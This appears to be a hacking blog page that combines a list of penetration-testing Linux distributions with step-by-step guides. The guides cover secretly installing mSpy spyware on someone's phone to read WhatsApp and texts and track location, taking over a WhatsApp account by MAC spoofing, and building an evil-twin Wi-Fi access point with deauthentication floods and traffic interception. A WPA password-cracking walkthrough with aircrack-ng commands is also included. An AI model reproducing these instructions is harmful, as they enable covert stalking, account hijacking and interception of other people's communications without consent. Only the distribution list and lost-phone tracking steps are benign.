Quote Of The Day

Blogger Tips and TricksLatest Tips And TricksBlogger Tricks

Friday 22 April 2016

Top 15 Advanced Operating Systems For Hackers

Top 15 Advanced Operating Systems For Hackers

 Top 15 Advanced Operating Systems

Today we are discussing about top 15 advanced operating systems which has great penetration testing or ethical hacking tools. the top Os on this list is my favorite Linux distro Kali Linux because it is very popular in pentesting and it is developed by the same team of BackTrack (Offensive security). i am not including BackTrack on this list because it is no more available officially on their website and the next version of BackTrack is Kali Linux. the listed operating systems are here based on Linux kernel so it is all free operating systems. (Included download links for all Os) :)

I am recommending you to read my earlier post to understand more about Linux distros related to hacking security: Linux Powerful Distros For Hacking Or Security: Kali, Tails And Qubes

Recommended: Become a Hacker: Best 20 Tips for Beginners to Start Learning


1. Kali Linux



Kali Linux is a Debian-derived Linux distribution designed for digital forensics and penetration testing. It is maintained and funded by Offensive Security Ltd. Mati Aharoni and Devon Kearns of Offensive Security developed it by rewriting BackTrack. Kali Linux is the most versatile and advanced penetration testing distro. Kali updates its tools and it is available for many different platforms like VMware and ARM. if you want to know more about Kali Linux then i recommend you read my previous article: An Introduction To Hacker’s OS Kali Linux And Setup Tutorial.

Click here to download



2. BackBox



It includes some of the most used security and analysis Linux tools, aiming to a wide spread of goals, ranging from web application analysis to network analysis, from stress tests to sniffing, including also vulnerability assessment, computer forensic analysis and exploitation.

The power of this distribution is given by its Launchpad repository core constantly updated to the last stable version of the most known and used ethical hacking tools. The integration and development of new tools inside the distribution follows the commencement of open source community and particularly the Debian Free Software Guidelines criteria.

Click here to download


3. Parrot-sec forensic os



Parrot Security is an operating system based on Debian GNU/Linux mixed with Frozenbox OS and Kali linux in order to provide the best penetration and security testing experience. it is an operating system for IT security and penetration testing developed by the Frozenbox Dev Team. It is a GNU/Linux distribution based on Debian and mixed with Kali.

Parrot uses Kali repositories in order to take latest updats for almost all the tools, but it also has its own dedicated repository where all the custom packets are kept. This is why this distro is not just a simple Kali “mod” but entire new concept which relies on Kali’s tool repositories. As such, it introduces a lot of new features and different developing choices.Parrot uses MATE as a Desktop Environment. Lightweight and powerful interface is derived from famous Gnome 2, and thanks to FrozenBox highly customizable with captivating icons, ad-hoc themes and wallpapers. System look is proposed and designed by the community members and also members of Frozenbox Network, who are closely following the development of this project.

Click here to download


4. DEFT




Deft is Ubuntu customization with a collection of computer forensic programs and documents created by thousands of individuals, teams and companies. Each of these works might come under a different licence. There Licence Policy describe the process that we follow in determining which software we will ship and by default on the deft install CD.

Click here to download


5. Live Hacking OS



As i am said before Live Hacking OS is also based on linux which has big package of hacking tools useful for ethical hacking or penetration testing. It includes the graphical user interface GNOME inbuilt. There is a second variation available which has command line only, and it requires very less hardware requirements.

Click here to download


6. Samurai Web Security Framework



The Samurai Web Testing Framework is a live linux environment that has been pre-configured to function as a web pen-testing environment. The CD contains the best of the open source and free tools that focus on testing and attacking websites. In developing this environment, we have based our tool selection on the tools we use in our security practice. We have included the tools used in all four steps of a web pen-test.

Click here to download



7. Network Security Toolkit (NST)



Network Security Toolkit (NST) is a bootable live CD based on Fedora Core. The toolkit was designed to provide easy access to best-of-breed open source network security applications and should run on most x86 platforms. The main intent of developing this toolkit was to provide the network security administrator with a comprehensive set of open source network security tools.

What we find rather fascinating with NST is that we can transform most x86 systems (Pentium II and above) into a system designed for network traffic analysis, intrusion detection, network packet generation, wireless network monitoring, a virtual system service server, or a sophisticated network/host scanner.

Click here to download



8. Bugtraq



Bugtraq is an electronic mailing list dedicated to issues about computer security. On-topic issues are new discussions about vulnerabilities, vendor security-related announcements, methods of exploitation, and how to fix them. It is a high-volume mailing list, and almost all new vulnerabilities are discussed there.
Bugtraq team is experienced freaks and developers, It is available in Debian, Ubuntu and OpenSuSe in 32 and 64 bit architectures.

Click here to download



9. NodeZero



It is said the necessity is the mother of all invention, and NodeZero Linux is no different. There team is built of testers and developers, who have come to the census that live systems do not offer what they need in their security audits. Penetration Testing distributions tend to have historically utilized the “Live” system concept of linux, which really means that they try not to make any permanent effects to a system. Ergo all changes are gone after reboot, and run from media such as discs and USB’s drives. However all that this maybe very handy for occasional testing, its usefulness can be depleted when your testing regularly. Its there believe that “Live System’s” just don’t scale well in a robust testing environment.

All though NodeZero Linux can be used as a “Live System” for occasional testing, its real strength comes from the understanding that a tester requires a strong and efficient system. This is achieved in our belief by working at a distribution that is a permanent installation, that benefits from a strong selection of tools, integrated with a stable linux environment.

Click here to download



10. Pentoo



Pentoo is a Live CD and Live USB designed for penetration testing and security assessment. Based on Gentoo Linux, Pentoo is provided both as 32 and 64 bit installable live cd. Pentoo is also available as an overlay for an existing Gentoo installation. It features packet injection patched wifi drivers, GPGPU cracking software, and lots of tools for penetration testing and security assessment. The Pentoo kernel includes grsecurity and PAX hardening and extra patches - with binaries compiled from a hardened toolchain with the latest nightly versions of some tools available.

Click here to download



11. GnackTrack



GnackTrack is an open and free project to merge penetration testing tools and the linux Gnome desktop. GnackTrack is a Live (and installable) Linux distribution designed for Penetration Testing and is based on Ubuntu.

Backtrack is not only a single player in the field of ethical hacking, so you can try some other distribution as well, if you are Gnome lover than must try this, however backtrack 5 is also available on Gnome platform. Just like backtrack, Gnacktrack comes with multiple tools that are really helpful to do a effective penetration testing, it has Metasploit, armitage, wa3f and others wonderful tools.

Click here to download



12. Blackbuntu






Blackbuntu is distribution for penetration testing which was specially designed for security training students and practitioners of information security. Blackbuntu is penetration testing distribution with GNOME Desktop Environment. It's currently being built using the Ubuntu 10.10 and work on reference Back|Track.

Click here to download



13. Knoppix STD



Knoppix STD (Security Tools Distribution) is a Live CD Linux distribution based on Knoppix that focused on computer security tools. It included GPL licensed tools in the following categories: authentication, password cracking, encryption, forensics, firewalls, honeypots, intrusion detection system, network utilities, penetration, packet sniffers, assemblers, vulnerability assessment and wireless networking. Knoppix STD version 0.1 was published January 24, 2004, on Knoppix 3.2. Thereafter, the project stagnated, lacking updated drivers and packages. A release date for version 0.2 has not yet been announced. A list of tools is available on the official website.

Click here to download



14. Weakerth4n



Weakerth4n is a penetration testing distribution which is built from Debian Squeeze.For the desktop environment it uses Fluxbox.This operating system is ideal for WiFi hacking as it contains plenty of Wireless tools. It has a very well maintained website and a devoted community. Built from Debian Squeeze (Fluxbox within a desktop environment) this operating system is particularly suited for WiFi hacking as it contains plenty of Wireless cracking and hacking tools.

Tools includes: Wifi attacks, SQL Hacking, Cisco Exploitation, Password Cracking, Web Hacking, Bluetooth, VoIP Hacking, Social Engineering, Information Gathering, Fuzzing Android Hacking, Networking and creating Shells.

Click here to download


15. Cyborg Hawk



The most advanced, powerful and yet beautiful penetration testing distribution ever created. Lined up with ultimate collection of tools for pro Ethical Hackers and Cyber Security Experts. It has 700 + tools while Kali have 300+ and also dedicated tools for and menu for mobile security and malware analysis . Also it is easy to compare it with Kali as to make a better OS than Kali we have to outperform it. It is a new operating system based on Ubuntu linux, i am not tested this OS that is why i placed it in the last of this list.

Cyborg Hawk is developed by Team Cybord led by Vaibhav Singh and Shahnawaz Alam from Ztrela Knowledge Solutions Pvt. Ltd.

Click here to download

       
   

Thursday 21 April 2016

How to Hack WhatsApp Account

How to Hack WhatsApp Account

Hack-Watsapp
Need to Hack WhatsApp Account?
Below is a WhatsApp Hack Guide with Complete Instructions!
Learn how to hack WhatsApp in simple steps with the following easy to follow and foolproof tutorial. Since WhatsApp has become one of the popular app to share messages and media instantly, it has also become a favorite place for many to engage in illicit activities. Therefore, in order to investigate the truth people are left with no choice other than to hack WhatsApp account.

Possible Ways to Hack WhatsApp

The following are the only two ways to hack WhatsApp account:

1. WhatsApp Hack using a Spying App: The Easiest Way

Even though there are several ways to hack WhatsApp, using a spy app is by far the most simple and easiest way. This method requires no prior hacking knowledge or technical skills to carry out and hence more suitable for common people. Installing a spy app to hack WhatsApp is as simple as installing any other app on mobile. Out of several apps out there, mSpy is one of my favorite one to hack WhatsApp:
WhatsApp Hack with mSpy
mSpy Features:
  • Hack phone Calls and Text Messages.
  • Hack WhatsApp, Skype and other popular messengers.
  • Track Real-Time Location with GPS Tracker.
  • Spy on Contact List and Web Browsing activities.
  • Monitor Emails, Pictures and Videos.
  • Operates in Hidden Mode and remains Undetected!
  • No Rooting Required!

How to Hack WhatsApp with this App?

  1. Download and Install the app on to the target phone which takes not more than a minute.
  2. After this is done, the app silently records all WhatsApp activities in hidden mode.
  3. All the recorded WhatsApp chat is sent to your online account.
  4. View all the information from anywhere at anytime with your online account.
You can download mSpy from the link below:
Compatiblity: Android, Apple iPhone, BlackBerry and Windows Mobile.

2. WhatsApp Hack by Spoofing Mac Address: The Tough Way

There is another method to hack WhatsApp known as Mac address spoofing which involves spoofing the Mac address of the target phone on your own phone. Unlike using spy apps, this one is somewhat time consuming and requires technical skills to implement. To spoof the Mac of the target WhatsApp phone address, follow the below mentioned steps:
  1. Find out the Mac address of the target phone on which you need to hack WhatsApp account:
    • For Android – Navigate to Settings —> About Device —> Status—> Wi-Fi MAC address
    • For iPhone – Navigate to Settings—> General —> About —> Wi-Fi address
  2. Once you’ve the Mac address of the target WHatsApp phone, you can spoof the Mac address as mentioned in my post: How to Spoof the MAC address.
  3. Next, install WhatsApp on your phone using the target phone number and verify it.
  4. Now, you’ve an exact replica of the target WhatsApp account and you should receive all the conversation and updates on your phone as well.
This method of WhatsApp hacking is quite time consuming and is known to have less success rate when compared to the method of using the spy apps. Therefore, if you are someone who does not have sufficient time and skills to implement this, I still recommend the use of mSPy to successfully hack WhatsApp account.
       
   

Spy on Text Messages: Complete Guide

Spy on Text Messages: Complete Guide

Spy on text messages
Since the popularity of text messages have significantly increased during the recent years, it has also become a popular channel for most people to exchange secret messages and engage in dubious activities. Therefore, in order to find out the truth sometimes it becomes obligatory to spy on text messages such as WhatsApp, Viber and FB Messenger. Particularly if you are a parent or an employer, it becomes your right to spy so as to investigate what is happening with your child or employee.

Popular Ways to Spy on Text Messages

The following are some of the commonly used methods to spy on text messages like as SMS, IM chat conversations and Emails.

1. Using a Spying App: The Easiest Way

Today, even though there exists a large number of mobile apps to spy on text messages, many are simply overpriced and some will never really stand up with the competition at all. However, there are a few spy apps that are really worth stating and mSpy is one among them. When it comes to spying on text messages, mSpy is my favorite one. In addition to SMS, this app is capable of spying on various text messaging apps like WhatsApp, Viber, Snapchat, iMessage, Skype and many more.
Spy on Text Messages
The following are some of the exciting features of mSpy which makes it a perfect choice for spying on text messages:
  • Spy on call logsSMS and Contacts
  • Secretly record emails, web history and bookmarks.
  • Spy on Internet activity including social media like FacebookTwitter andGmail.
  • Spy on text messaging apps like WhatsApp, iMessage, Viber, Snapchat, Skype, LINE and more.
  • Track GPS locations in real-time.
  • Record keystrokes, photos and videos.
  • Operates in a complete stealth mode and remains undetected!.
For parents and employers, mSpy can offer an additional help as it supports a handful of control features as well:
  • Block access to unwanted apps and calls.
  • Remotely lock the phone or restrict its usage.
  • Remotely delete unwanted contacts, call logs, SMS and photos if desired.
  • Get instant alerts when profane language is typed or viewed.

How it Works?

After you order mSpy you will need to install the app onto the target phone which will only take 2-3 minutes to complete. If you need any assistance, the support team is ready to help you out any time you need.
Once the installation is complete, all of the recorded text messages and data will show on your online dashboard which can be accessed from any web browser across the world.
Compatible Phones: Android, BlackBerry, iPhone, iPad, Windows Mobile and Tablets.

2. Using a SIM Card Reader to Recover Text Messages

If you can’t really afford a spying app, you can buy a cheap SIM card reader from the market and use the target person’s SIM to recover text messages, phone contacts and email addresses stored on it. This can be done using the following steps:
  1. Switch Off the target phone and remove the SIM card from it.
  2. Insert the SIM card into the SIM card reader and plug-in the SIM card reader to the USB port on your personal computer.
  3. If your SIM card comes with a software CD/DVD, install it on your computer. This will help you recover any of the stored text messages from the SIM and store it on your PC for later review.
It is needless to mention that this method has clear drawbacks as there are chances of text messages from being deleted from the SIM before you get access to it. Also this method can only recover SMS (stored on SIM) and not other text messages from messaging apps like as WhatsApp, Viber, Snapchat etc.
Therefore to overcome this drawback I still recommend the usage of spying app like mSpy to spy on text messages.
       
   

How to Track a Cell Phone



How to Track a Cell Phone

Track Phone Location

Are You Looking to Track a Cell Phone Location?
Relax, Here is a Complete Cell Phone Tracking Guide!
Are you looking to know how to track a cell phone with pin point accuracy? Do you need to exactly know where your child or employees are moving around during your absence? If so you have come to the right place. In this article I will let you know some of the possible methods to GPS track a cell phone in simple steps.

1. How to Track a Cell Phone that Belongs to Someone Else?

If you need to track someone else’s phone such as your children or employees, you can simply use a cell phone tracking app such as mSpy. This is a very small app that can be installed in just a few simple steps and takes only 2-3 minutes to complete. Once installed the app stays hidden on the phone but keeps track of every activity on the phone including its GPS location, Call Logs, Text Messages and more.
Track a Cell Phone with mSpy
mSpy Features:
  • GPS Location Tracking: GPS positions are uploaded at a time interval you select with a link to the map.
  • Track Text Messages & Emails: Every text message sent and received including SMS and emails are logged even if the phone logs are deleted.
  • Call Logs: Each incoming and outgoing number on the phone is logged along with duration, date and time stamp.
  • Phone Contacts: Get access to complete contact list on the target phone.
  • Browser History: All websites visited on the phone are logged.
  • Social Networking & Messenger Activity: All social media activity such as Facebook, Twitter, LinkedIn, WhatsApp, Skype, iMessages, Instagram and many more are recorded.

How it Works?

You will have to download and install the app onto the target phone of whose location and activities you want to track. Installation takes only a few minutes during which you should have the target phone in your hand.
Once the installation is complete, the tracking process will begin immediately and the recorded logs are silently uploaded to your mSpy account. You can login to your secure online account from your computer or phone at any time to view the logs containing GPS location, Call activities Text Messages and more. You can download mSpy from the link below:
Supported Phones: Android, iPhone, iPad and Tablets.

2. Tracking a Lost phone

Now, let us look at some of the possible options to track a phone in case if it is lost or stolen.

For Android Phones:

If you need to track a lost android phone, you can follow the steps mentioned below:
  1. Download Android Device Manager from Google play store and install it on another android device. This app lets you track your stolen android phone and also lets to remotely lock or erase all the data on it.
    2. Android Device Manager
  2. From “Android Device Manager” log into your Google account using the same ID associated with your lost phone. After successful login this app will attempt to locate your device and show its last known location on the map.
  3. In addition, you will also be able to perform several actions on your lost phone such as give a RingLock the device or Erase all the data stored on it.

For Apple iPhones:

If you need to track a lost iPhone, you can follow the steps mentioned below:
  1. Login to the iCould Website using an Apple ID associated with your lost phone. Since location tracking is turned on by default on all iPhone devices, iCould lets you track it from your web browser or your iPad and shows its location on the map.
    2. iColud Website
  2. If your phone is found nearby to your location you have an option to Play Sound on it so that your iPhone will emit a sound, helping you track it down.
  3. If this does not help, you can choose the option Lost Mode which will remotely lock your phone down and display a phone number that can be reached at.
  4. If none of the above options work, you can finally decide to go with the option Erase iPhone which will completely wipe out all the data stored on it. This way you can prevent your private information from falling into the wrong hands.

For Windows Phones:

In order to track down a lost Windows phone, you can try the below mentioned steps:
  1. Go to Windows Phone Website and locate the option Find My Phone on the top-right corner of the page.
    2. Track Windows Phone
  2. This will ask you to sign-in using your Windows account associated with your lost phone. If your phone gets traced you will see a map showing its exact location. You will also find options to LockRing and Erase its data in case if your phone is found to be completely lost.
       
   

Evil Twin Tutorial

Evil Twin Tutorial

Prerequisites

  1. Kali Linux
  2. Prior experience with wireless hacking
You will also need to install a tool (bridge utils) which doesn't come pre-installed in Kali. No big deal-
apt-get install bridge-utils

Objectives

The whole process can be broken down into the following steps-
  1. Finding out about the access point (AP) you want to imitate, and then actually imitating it (i.e. creating another access point with the same SSID and everything). We'll use airmon-ngfor finding necessary info about the network, and airbase-ng to create it's twin.
  2. Forcing the client to disconnect from the real AP and connecting to yours. We'll useaireplay-ng to deauthenticate the client, and strong signal strength to make it connect to our network.
  3. Making sure the client doesn't notice that he connected to a fake AP. That basically means that we have to provide internet access to our client after he has connected to the fake wireless network. For that we will need to have internet access ourselves, which can be routed to out client.
  4. Have fun - monitor traffic from the client, maybe hack into his computer using metasploit. 
PS: The first 3 are primary objectives, the last one is optional and not a part of evil twin attack as such. It is rather a man in the middle attack. Picture credits : firewalls.com


Information Gathering - airmon-ng

To see available wireless interfaces-
iwconfig



To start monitor mode on the available wireless interface (say wlan0)-
airmon-ng start wlan0
To capture packets from the air on monitor mode interface (mon0)
 airodump-ng mon0
 After about 30-40 seconds, press ctrl+c and leave the terminal as is. Open a new terminal.


Creating the twin

Now we will use airbase-ng to create the twin network of one of the networks that showed up in the airodump-ng list. Remember, you need to have a client connected to the network (this client will be forced to disconnect from that network and connect to ours), so choose the network accordingly. Now after you have selected the network, take a note of it's ESSID and BSSID. Replace them in given code-

airbase-ng -a <BSSID here> --essid <ESSID here> -c <channel here> <interface name>
If you face any problems, a shorter code will be-
airbase-ng --essid <name of network> mon0 
Remove the angular brackets (< & >) and choose any channel that you want. Also, the BSSID can be randomly selected too, and doesn't have to match with the target. The interface would be mon0 (or whatever is the card you want to use) . The only thing identical about the twins has to be their ESSIDs (which is the name of the network). However, it is better to keep all parameters same to make it look more real. After you are done entering the parameters and running the command, you'll see that airbase turned your wireless adapter into an access point.
Note : We will need to provide internet access to our client at a later stage. Make sure you have a method of connecting to the net other than wireless internet, because your card will be busy acting like an AP, and won't be able to provide you with internet connectivity. So, either you need another card, or broadband/ADSL/3G/4G/2G internet.

Man in the middle attack : Pic Credits:  owasp.net

Telling the client to get lost

Now we have to ask the client to disconnect from that AP. Our twin won't work if the client is connected to the other network. We need to force it to disconnect from the real network and connect to the twin.
For this, the first part is to force it to disconnect. Aireplay will do that for us-
aireplay-ng --deauth 0 -a <BSSID> mon0 --ignore-negative-one


The 0 species the time internal at which to send the deauth request. 0 means extremely fast, 1 would mean send a packet every 1 seconds, 2 would mean a packet every 2 seconds, and so on. If you keep it as 0, then your client would be disconnected in a matter of seconds, so fire up the command, and press ctrl+c after a few seconds only. Note that the deauth is sent on broadcast, so all the clients (not just one) connected to the network will disconnect. Disconnecting a specific client is also possible.

Not the real one, but why the fake one

Even after being disconnected from the real AP, the client may choose to keep trying to connect to the same AP a few more times, instead of trying to connect to ours. We need to make our AP stand out, and for that, we need more signal strength. There are 2 ways to do that-

  1. Physically move closer to the client.
  2. Power up your wireless card to transmit at more power. 
The latter can be done with the following command -
iwconfig wlan0 txpower 27
Here 27 is the transmission power in dBm. Some cards can't transmit at high power, and some can transmit at extremely high power. Alfa cards usually support upto 30dBm, but many countries don't allow the card to transmit at such powers. Try changing 27 to 30 and you'll see what I mean. In Bolivia, however, you can transmit at 30dBm, and by changing the regulatory domain, we can overcome the power limitation.
iw reg set BO
iwconfig wlan0 txpower 30
It is strongly advised to not break laws as the transmission limits are there for a reason, and very high power can be harmful to health (I have no experimental evidence). Nevertheless, the client should connect to you if your signal strength is stronger than that you the real twin.

Note : If you are unable to get your client to connect to you, there is another option. You can leave him with no options. If you keep transmitting the deauth packets continuously (i.e. don't press ctrl+c after the client has disconnected), he will have no choice but to connect to you. However, this is quite an unstable situation, and the client will go back to the real twin as soon as it gets the chance.


Give the fake AP internet access

Now we need to provide internet access to the fake AP. This can be done in various ways. In this tutorial, we will consider that we have an interface x0 which has internet connectivity. Now, if you are connected to net via wireless, replace x0 with wlan1 or wlan0, a 3G modem will show up as ppp0. Nevertheless, you just have to know which interface is providing you with internet, and you can route the internet access to your client.

Interfaces

  • x0 - This has internet access
  • at0 - This is create by airbase-ng (wired face of the wireless access point). If you can somehow give internet access to at0, then the clients connected to your fake wireless network can connect to the net.
  • evil - This is an interface that we will create, whose job will be to actually bridge the networks.

Creating evil

We will use Bridge control utility provided by Kali, brctl. Execute the following code-
brctl addbr evil
This will create the bridge. Now we have to specify which two interfaces have to be bridged-
brctl addif evil x0
brctl addif evil at0
We can assign an IP to the interfaces and bring them up using-
ifconfig x0 0.0.0.0 up 
ifconfig at0 0.0.0.0 up
 Also bring up the evil interface (the interfaces aren't always up by default so we have to do this many times)
ifconfig evil up
Now to auto configure all the complicated DHCP settings, we'll use dhclient
dhclient3 evil & 
Finally, all the configurations have been completed. You can execute ifconfig and see the results, which will show you all the interfaces you have created.
Officially, the evil twin attack is complete. The client is now connected to your fake network, and can use the internet pretty easily. He will not have any way to find out what went wrong. However, the last objective remains.

Have fun

Now that the client is using the internet via our evil interface, we can do some evil stuff. This actually comes under a Man In The Middle attack (MITM), and I'll write a detailed tutorial for it later. However, for the time being, I will give you some idea what you can do.

Sniffing using Wireshark

Now all the packets that go from the user to the internet pass through out evil interface, and these packets can be monitored via wireshark. I won't teach you how to use it here, since it is a GUI tool. You can take a look at their website to get an idea on how to use wireshark. Pic credits: The picture on the right has been directly taken from their website. 

       
    #ref-menu

WPA/WPA-2 cracking using Dictionary attack with Aircrack-ng

WPA/WPA-2 cracking using Dictionary attack with Aircrack-ng

WPA cracking involves 2 steps-

  1. Capture the handshake
  2. Crack the handshake to get the password

We have already covered WPA-handshake capture in a lot of detail. In this tutorial we will actually crack a WPA handshake file using dictionary attack. Our tool of choice for this tutorial will be aircrack-ng. We will not bother about the speed of various tools in this post. However, in the next post, we will compare various CPU and GPU algorithms for WPA hash cracking. I'd like to add that I already know the password of the network so I'll simply put it into the dictionary that I'm using. A full fledged dictionary attack is quite time consuming.

Also, a lot of people are facing problems with monitor mode in Kali 2.0. I have a post regarding that coming soon.
PS: If you stumbled on this post out of nowhere and find it hard to follow, I recommend you go through some of the easier posts first. How to use this site is a good place to begin.




My current state

I have already captured a WPA handshake for my Wifi. The password is fairly strong so one can't rely on any dictionary. So just for the sake of this exercise, I'll put the password in the dictionary myself.

My handshake capture


The handshake is captured in a file students2-01.cap (you can name yours whatever you want)

wireshark students2-01.cap
This command can be used to go through the packets captured. We will learn more about Wireshark later. I will guide you through a complete EAPoL 4-way handshake. For this tutorial, lets move on.

My dictionary file

root@kali:~# cat new.txt
firstpass
secondpass
randompass
************ 


The last line has the password.

Action!

root@kali:~# aircrack-ng students2-01.cap -w new.txt

It will ask for index number of target network. Select the network you want to hack.
I chose 13


 It didn't take any time at all considering Aircrack had to check a total of 4 keys!!!
                                 Aircrack-ng 1.2 rc2


                   [00:00:00] 4 keys tested (589.45 k/s)


                           KEY FOUND! [ ***************** ]


      Master Key     : 60 B7 9D 29 26 0F 92 65 ** ** ** ** **

      Transient Key  : 1C F2 23 FE B3 67 ** ** ** *
                      
      EAPOL HMAC     : F9 A1 5D ** ** ** ** **
       
    #ref-menu

Text

Popular Posts

Fb